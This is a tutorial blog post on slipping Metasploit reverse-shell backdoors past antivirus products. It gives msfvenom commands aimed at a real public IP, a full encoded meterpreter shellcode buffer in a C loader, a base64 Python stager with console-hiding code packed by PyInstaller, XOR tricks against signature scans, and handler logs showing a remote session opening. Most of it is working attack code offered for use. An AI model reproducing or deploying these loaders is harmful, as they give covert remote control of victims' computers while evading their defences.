Bypassing anti-virus with payload separation

Anti-virus products detect by signature, by behaviour, and by cloud look-up, and the cloud look-up is itself mostly signature matching. Every engine scans the file on disk, header first, so if the recognisable part (the payload) is kept apart from the code that runs it, or is stored in a form the scanner does not recognise, the on-disk file matches no signature and the current mainstream engines let it through. This only covers static detection: once the payload is decoded and running, behaviour-based and in-memory checks still apply.

1. Backdoor compiled from C

root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=123.56.138.161 LPORT=1234 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] = 
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";

Copy the shellcode above into the program below, which jumps to it with inline assembly, and compile it as a 32-bit .exe (the payload was generated with -a x86).

#include <stdio.h>
#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // hide the console window
#pragma comment(linker,"/INCREMENTAL:NO")                                     // smaller binary
#pragma comment(linker, "/section:.data,RWE")                                 // mark .data read/write/execute; without the E the jmp below faults under DEP

unsigned char shellcode[] = 
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";
// Jump straight into the buffer. This only builds with the MSVC x86 (32-bit)
// compiler: __asm is not supported by the x64 compiler, and the payload is x86.
// jmp (rather than call) means the function never returns.
void RunShellCode123_4()
{
    __asm
    {
        mov eax, offset shellcode;
        jmp eax;
    }
}

int main(int argc, char **argv)
{
    RunShellCode123_4();
    return 0;
}

Listener setup

root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfconsole 
                                                  
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: View advanced module options with advanced

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 123.56.138.161
LHOST => 123.56.138.161
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > exploit 

[-] Handler failed to bind to 123.56.138.161:1234:-  -
[*] Started reverse TCP handler on 0.0.0.0:1234 

This method did not evade much: PC Manager (电脑管家) did not flag it at first, but Huorong (火绒) killed it instantly.
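Why the loader above is easy to catch can be shown with a byte-level check. The script below is an added example, not code from the original post: it turns the `-f c` output into raw bytes, scans them for the fnstenv [esp-0xc] instruction (d9 74 24 f4) that every x86/shikata_ga_nai decoder emits right after its first FPU instruction to find its own address, and shows that XOR-ing the stored buffer with a key (a constructed one here) is enough to stop that particular match. The signature table, the key and the function names are assumptions for illustration; real engine signatures are longer and not public, and a hit from this script only means the bytes lie in the file in plain form.

```python
import re
from typing import Dict, List, Tuple

# Excerpt of the shikata_ga_nai-encoded buffer msfvenom printed above (first
# three lines, 45 bytes); the decoder prologue is what matters here.
MSFVENOM_C_EXCERPT = r'''
unsigned char buf[] =
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a";
'''

# Constructed signature table for this example. The single entry is the
# fnstenv [esp-0xc] GetPC sequence x86/shikata_ga_nai uses to locate itself;
# it sits right after the decoder's first FPU instruction (here \xda\xda).
SIGNATURES: Dict[str, bytes] = {
    "shikata_ga_nai_fnstenv_getpc": bytes.fromhex("d97424f4"),
}

# Constructed 4-byte key; any key that is not all zeros works for the demo.
XOR_KEY = bytes.fromhex("5aa513c7")


def parse_c_shellcode(text: str) -> bytes:
    """Turn msfvenom `-f c` output (a C string literal) into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def scan(blob: bytes) -> List[Tuple[str, int]]:
    """Return (signature name, offset) for every match, like a naive scanner."""
    hits = []
    for name, pattern in SIGNATURES.items():
        off = blob.find(pattern)
        while off != -1:
            hits.append((name, off))
            off = blob.find(pattern, off + 1)
    return hits


def xor_crypt(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice restores the original bytes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


if __name__ == "__main__":
    plain = parse_c_shellcode(MSFVENOM_C_EXCERPT)
    print(len(plain), "bytes; hits in the buffer as stored by the C loader:", scan(plain))
    stored = xor_crypt(plain, XOR_KEY)
    print("hits in the XOR-stored buffer:", scan(stored))
    print("round trip ok:", xor_crypt(stored, XOR_KEY) == plain)
```

The same parse-and-scan can be run over the compiled .exe (read it in binary mode and pass the bytes to scan) to confirm the buffer is sitting verbatim in the .data section. Note that XOR storage only changes what the file looks like on disk; the decoded payload still appears in memory once the loader runs.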

2. Python backdoor with static evasion

Generate the payload with MSF

root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -p python/meterpreter/reverse_tcp > lhost=123.56.138.161 lport=1234 -f raw -o wk3.py
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder specified, outputting raw payload
Payload size: 433 bytes
Saved as: wk3.py
root@iZ2ze0r5hel5o5dt2w9uluZ:~# cat wk3.py 
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yNS4yMy4xNjknLDEyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')[0]))
root@iZ2ze0r5hel5o5dt2w9uluZ:~# 

Copy the payload and add code that hides the console window. Check first where the stager actually calls back: in the msfvenom command above, the `>` in front of `lhost=` is read by the shell as output redirection (a file named lhost=123.56.138.161 is created and the option never reaches msfvenom), so msfvenom fell back to the address of the server's own interface. Decoding the base64 gives s.connect(('172.25.23.169',1234)), the internal address, not the public 123.56.138.161. Run the command on a single line (msfvenom -p python/meterpreter/reverse_tcp LHOST=123.56.138.161 LPORT=1234 -f raw -o wk3.py) and decode the result again before building.

import ctypes

# Hide the console window so nothing is shown when the packed .exe runs.
# GetConsoleWindow returns the console's HWND (0 if there is none); ShowWindow
# with SW_HIDE (0) hides it. An HWND is not a kernel handle, so there is nothing
# to CloseHandle here.
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
    ctypes.windll.user32.ShowWindow(whnd, 0)

# msfvenom stager, unchanged: decode the base64 and exec the stager source.
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yNS4yMy4xNjknLDEyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')[0]))
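Before packaging, it is worth confirming where the stager will connect. The script below is an added example, not the post's code: it undoes the exec(base64.b64decode(...)) wrapper, pulls host and port out of the stager's s.connect((...)) call and compares them with the listener you intend to use. Run against the base64 string printed above it reports 172.25.23.169, the server's own interface, rather than 123.56.138.161. The frame_stage helper shows the 4-byte big-endian length prefix the stager reads (struct.unpack('>I', s.recv(4))) before the stage itself, which is what the "Sending stage (53755 bytes)" step in the handler output delivers. The regex and the function names are mine, not msfvenom's.

```python
import base64
import re
import struct
from typing import Optional, Tuple

# The base64 blob msfvenom wrote into wk3.py above (copied from the page).
PAGE_STAGER_B64 = (
    "aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE3Mi4yNS4yMy4xNjknLDEyMzQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK"
)

# Matches the s.connect(('host',port)) line of the python/meterpreter stager.
CONNECT_RE = re.compile(r"connect\(\(\s*'([^']+)'\s*,\s*(\d+)\s*\)\)")


def decode_stager(b64: str) -> str:
    """Reverse the wrapper. codecs.getencoder('utf-8')(s)[0] is just s.encode(),
    so b64decode of the UTF-8 bytes yields the stager source."""
    return base64.b64decode(b64.encode("utf-8")).decode("utf-8")


def extract_stager_target(b64: str) -> Optional[Tuple[str, int]]:
    """(host, port) the stager will connect to, or None if no connect() found."""
    m = CONNECT_RE.search(decode_stager(b64))
    return (m.group(1), int(m.group(2))) if m else None


def matches_listener(b64: str, lhost: str, lport: int) -> bool:
    """True only if the embedded target is exactly the listener we run."""
    return extract_stager_target(b64) == (lhost, lport)


def frame_stage(stage: bytes) -> bytes:
    """What the handler sends back: a big-endian uint32 length, then exactly
    that many bytes, which the stager accumulates with recv() and exec()s."""
    return struct.pack(">I", len(stage)) + stage


if __name__ == "__main__":
    print(decode_stager(PAGE_STAGER_B64))
    print("stager connects to:", extract_stager_target(PAGE_STAGER_B64))
    print("points at 123.56.138.161:1234?",
          matches_listener(PAGE_STAGER_B64, "123.56.138.161", 1234))
```

Paste any regenerated wk3.py's base64 into PAGE_STAGER_B64 and rerun; matches_listener should return True for the public LHOST/LPORT before you hand the script to PyInstaller.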

Build the executable with PyInstaller (pip install pyinstaller if it is not installed). -F packs everything into a single file; -w (--noconsole) would also suppress the console window without the ctypes trick above.

PS C:\Users\ASUS\Desktop> pyinstaller -F .\wk3.py
100 INFO: PyInstaller: 4.0
100 INFO: Python: 3.6.5
101 INFO: Platform: Windows-10-10.0.18362-SP0
102 INFO: wrote C:\Users\ASUS\Desktop\wk3.spec
105 INFO: UPX is not available.
107 INFO: Extending PYTHONPATH with paths
['C:\\Users\\ASUS\\Desktop', 'C:\\Users\\ASUS\\Desktop']
117 INFO: checking Analysis
117 INFO: Building Analysis because Analysis-00.toc is non existent
117 INFO: Initializing module dependency graph...
120 INFO: Caching module graph hooks...
138 INFO: Analyzing base_library.zip ...
3169 INFO: Caching module dependency graph...
3262 INFO: running Analysis Analysis-00.toc
3269 INFO: Adding Microsoft.Windows.Common-Controls to dependent assemblies of final executable
  required by c:\users\asus\appdata\local\programs\python\python36\python.exe
3608 INFO: Analyzing C:\Users\ASUS\Desktop\wk3.py
3636 INFO: Processing module hooks...
3636 INFO: Loading module hook 'hook-encodings.py' from 'c:\\users\\asus\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\PyInstaller\\hooks'...
3724 INFO: Loading module hook 'hook-xml.py' from 'c:\\users\\asus\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\PyInstaller\\hooks'...
3979 INFO: Looking for ctypes DLLs
3980 INFO: Analyzing run-time hooks ...
3984 INFO: Looking for dynamic libraries
4077 INFO: Looking for eggs
4077 INFO: Using Python library c:\users\asus\appdata\local\programs\python\python36\python36.dll
4078 INFO: Found binding redirects:
[]
4081 INFO: Warnings written to C:\Users\ASUS\Desktop\build\wk3\warn-wk3.txt
4123 INFO: Graph cross-reference written to C:\Users\ASUS\Desktop\build\wk3\xref-wk3.html
4132 INFO: checking PYZ
4133 INFO: Building PYZ because PYZ-00.toc is non existent
4133 INFO: Building PYZ (ZlibArchive) C:\Users\ASUS\Desktop\build\wk3\PYZ-00.pyz
4642 INFO: Building PYZ (ZlibArchive) C:\Users\ASUS\Desktop\build\wk3\PYZ-00.pyz completed successfully.
4652 INFO: checking PKG
4652 INFO: Building PKG because PKG-00.toc is non existent
4652 INFO: Building PKG (CArchive) PKG-00.pkg
6198 INFO: Building PKG (CArchive) PKG-00.pkg completed successfully.
6201 INFO: Bootloader c:\users\asus\appdata\local\programs\python\python36\lib\site-packages\PyInstaller\bootloader\Windows-64bit\run.exe
6202 INFO: checking EXE
6202 INFO: Building EXE because EXE-00.toc is non existent
6202 INFO: Building EXE from EXE-00.toc
6202 INFO: Appending archive to EXE C:\Users\ASUS\Desktop\dist\wk3.exe
6211 INFO: Building EXE from EXE-00.toc completed successfully.

Huorong scan result (screenshot): not flagged

PC Manager scan result (screenshot): not flagged

Start the MSF listener. The "Handler failed to bind" warning is harmless here: the public address 123.56.138.161 is not configured on the server's own interface (which is 172.25.23.169, as the session line shows), so Metasploit falls back to listening on 0.0.0.0 and still receives the connection.

root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfconsole 
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.101-dev                         ]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the edit command to open the currently active module in your editor

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 123.56.138.161
LHOST => 123.56.138.161
msf5 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf5 exploit(multi/handler) > exploit 

[-] Handler failed to bind to 123.56.138.161:1234:-  -
[*] Started reverse TCP handler on 0.0.0.0:1234 
[*] Sending stage (53755 bytes) to 182.125.157.252
[*] Meterpreter session 1 opened (172.25.23.169:1234 -> 182.125.157.252:22104) at 2020-10-14 22:12:23 +0800

meterpreter > getuid
Server username: ASUS
meterpreter > 

Testing shows that separation with Python gives the best evasion at the moment; AV treats Python as a scripting language and probably applies weaker detection to it.
